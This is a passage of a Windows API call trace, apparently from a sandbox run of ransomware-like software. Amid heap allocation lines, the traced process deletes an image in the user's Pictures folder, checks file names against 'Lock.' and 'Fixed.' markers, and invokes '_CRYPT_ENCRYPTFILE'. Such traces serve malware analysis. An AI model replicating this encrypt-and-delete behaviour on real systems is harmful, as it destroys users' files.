1 [0251.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0251.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0251.668] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0251.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0251.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0251.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0251.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0251.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0251.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0251.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0251.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0251.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0251.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0251.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0251.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0251.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0251.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0251.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0251.669] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51160 | out: hHeap=0x970000) returned 1 [0251.669] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0251.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0251.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0251.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d58 [0251.725] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0251.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0251.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0251.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0251.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0251.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e699e8 [0251.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fe0 [0251.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0251.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0251.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0251.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0251.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0251.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0251.725] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0251.725] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0251.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fc8 | out: hHeap=0x970000) returned 1 [0251.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e699e8 | out: hHeap=0x970000) returned 1 [0251.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0251.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d58 | out: hHeap=0x970000) returned 1 [0251.726] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x62) returned 0x2e58910 [0251.726] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/NU6pYHrnfbris-w219Y.png", nBufferLength=0x104, lpBuffer=0x8cee18, lpFilePart=0x8cedf4 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\NU6pYHrnfbris-w219Y.png", lpFilePart=0x8cedf4*="NU6pYHrnfbris-w219Y.png") returned 0x30 [0251.726] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0251.726] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\NU6pYHrnfbris-w219Y.png" (normalized: "c:\\users\\fd1hvy\\pictures\\nu6pyhrnfbris-w219y.png")) returned 0x20 [0251.726] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures\\NU6pYHrnfbris-w219Y.png", lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf6c49a0, ftCreationTime.dwHighDateTime=0x1d5e0c6, ftLastAccessTime.dwLowDateTime=0x5992d230, ftLastAccessTime.dwHighDateTime=0x1d5e4dc, ftLastWriteTime.dwLowDateTime=0x5992d230, ftLastWriteTime.dwHighDateTime=0x1d5e4dc, nFileSizeHigh=0x0, nFileSizeLow=0x11ef3, dwReserved0=0x1, dwReserved1=0x1c, cFileName="NU6pYHrnfbris-w219Y.png", cAlternateFileName="NU6PYH~1.PNG")) returned 0xa87390 [0251.726] DeleteFileW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\NU6pYHrnfbris-w219Y.png" (normalized: "c:\\users\\fd1hvy\\pictures\\nu6pyhrnfbris-w219y.png")) returned 1 [0251.803] FindNextFileW (in: hFindFile=0xa87390, lpFindFileData=0x8cf028 | out: lpFindFileData=0x8cf028*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdf6c49a0, ftCreationTime.dwHighDateTime=0x1d5e0c6, ftLastAccessTime.dwLowDateTime=0x5992d230, ftLastAccessTime.dwHighDateTime=0x1d5e4dc, ftLastWriteTime.dwLowDateTime=0x5992d230, ftLastWriteTime.dwHighDateTime=0x1d5e4dc, nFileSizeHigh=0x0, nFileSizeLow=0x11ef3, dwReserved0=0x1, dwReserved1=0x1c, cFileName="NU6pYHrnfbris-w219Y.png", cAlternateFileName="NU6PYH~1.PNG")) returned 0 [0251.803] FindClose (in: hFindFile=0xa87390 | out: hFindFile=0xa87390) returned 1 [0251.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0251.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0251.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0251.803] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0251.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0251.804] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0251.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0251.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0251.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0251.804] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf560, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0251.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0251.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0251.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0251.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0251.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0251.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0251.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0251.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e79310 | out: hHeap=0x970000) returned 1 [0251.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0251.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0251.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0251.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0251.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0251.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0251.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0251.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0251.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0251.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0251.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51088 [0251.804] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0251.804] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0251.805] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x62) returned 0x2e58910 [0251.805] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/NU6pYHrnfbris-w219Y.png", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Pictures\\NU6pYHrnfbris-w219Y.png", lpFilePart=0x8cf650*="NU6pYHrnfbris-w219Y.png") returned 0x30 [0251.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e58910 | out: hHeap=0x970000) returned 1 [0251.805] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Pictures\\NU6pYHrnfbris-w219Y.png" (normalized: "c:\\users\\fd1hvy\\pictures\\nu6pyhrnfbris-w219y.png")) returned 0xffffffff [0251.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0251.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0251.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51298 | out: hHeap=0x970000) returned 1 [0251.805] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511d8 | out: hHeap=0x970000) returned 1 [0251.805] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0251.921] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0251.921] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0251.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0251.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0251.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0251.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0251.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0251.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0251.921] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q0Ayv.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0Ayv.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0251.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ayv.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0251.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yv.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v.png", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0251.922] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0251.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0251.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0251.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0251.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0251.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0251.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="q0Ayv.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="0Ayv.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0251.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="Ayv.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 1 [0251.922] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="yv.png", cchCount1=6, lpString2="Fixed.", cchCount2=6) returned 3 [0251.922] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0251.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e56098 [0251.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0251.922] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTFILE", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTFILE") returned 0x12 [0251.922] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0251.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0251.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0251.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bf8 [0251.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0251.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0251.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0251.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0251.923] GetEnvironmentVariableW (in: lpName="USERPROFILE", lpBuffer=0x8cf4d0, nSize=0x104 | out: lpBuffer="C:\\Users\\FD1HVy") returned 0xf [0251.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0251.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e79310 [0251.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c48 [0251.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0251.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0251.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0251.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e58910 [0251.923] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0251.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54cc8 [0251.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0251.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510d0 [0251.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b78 [0251.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0251.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0251.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c18 [0251.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0251.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0251.924] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0251.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0251.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0251.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0251.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c78 [0251.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0251.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0251.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c88 [0251.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0251.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0251.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54cc8 [0251.924] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0251.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0251.925] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0251.925] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0251.925] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Pictures/q0Ayv.png", lpFindFileData=0x8cf170 | out: lpFindFileData=0x8cf170*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf5ef4830, ftCreationTime.dwHighDateTime=0x1d5f07f, ftLastAccessTime.dwLowDateTime=0xeef15e10, ftLastAccessTime.dwHighDateTime=0x1d5ec42, ftLastWriteTime.dwLowDateTime=0xeef15e10, ftLastWriteTime.dwHighDateTime=0x1d5ec42, nFileSizeHigh=0x0, nFileSizeLow=0xb42a, dwReserved0=0x0, dwReserved1=0x8cf1b8, cFileName="q0Ayv.png", cAlternateFileName="")) returned 0xa87250 [0251.926] FindClose (in: hFindFile=0xa87250 | out: hFindFile=0xa87250) returned 1 [0251.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513a0 | out: hHeap=0x970000) returned 1 [0251.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512f8 | out: hHeap=0x970000) returned 1 [0251.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511a8 | out: hHeap=0x970000) returned 1 [0251.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0251.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0251.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0251.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51328 | out: hHeap=0x970000) returned 1 [0251.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54170 | out: hHeap=0x970000) returned 1 [0251.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0251.927] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e513e8 [0251.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0251.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e514a8 [0251.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51388 [0251.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0251.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54170 [0251.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51370 [0251.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0251.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512e0 [0251.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51490 [0251.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0251.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e514a8 | out: hHeap=0x970000) returned 1 [0251.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0251.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0251.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0251.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51490 | out: hHeap=0x970000) returned 1 [0251.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e513e8 | out: hHeap=0x970000) returned 1 [0251.927] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0251.927] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0251.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54558 [0251.927] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c38 [0251.927] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0251.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54558 | out: hHeap=0x970000) returned 1 [0251.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c38 | out: hHeap=0x970000) returned 1 [0251.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e513b8 [0251.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0251.928] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0251.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c38 [0251.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e55c70 [0251.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0251.928] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0251.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55c70 | out: hHeap=0x970000) returned 1 [0251.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0251.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51388 [0251.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0251.928] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0251.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0251.928] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0251.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0251.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0251.928] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0251.929] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51388 | out: hHeap=0x970000) returned 1 [0251.929] 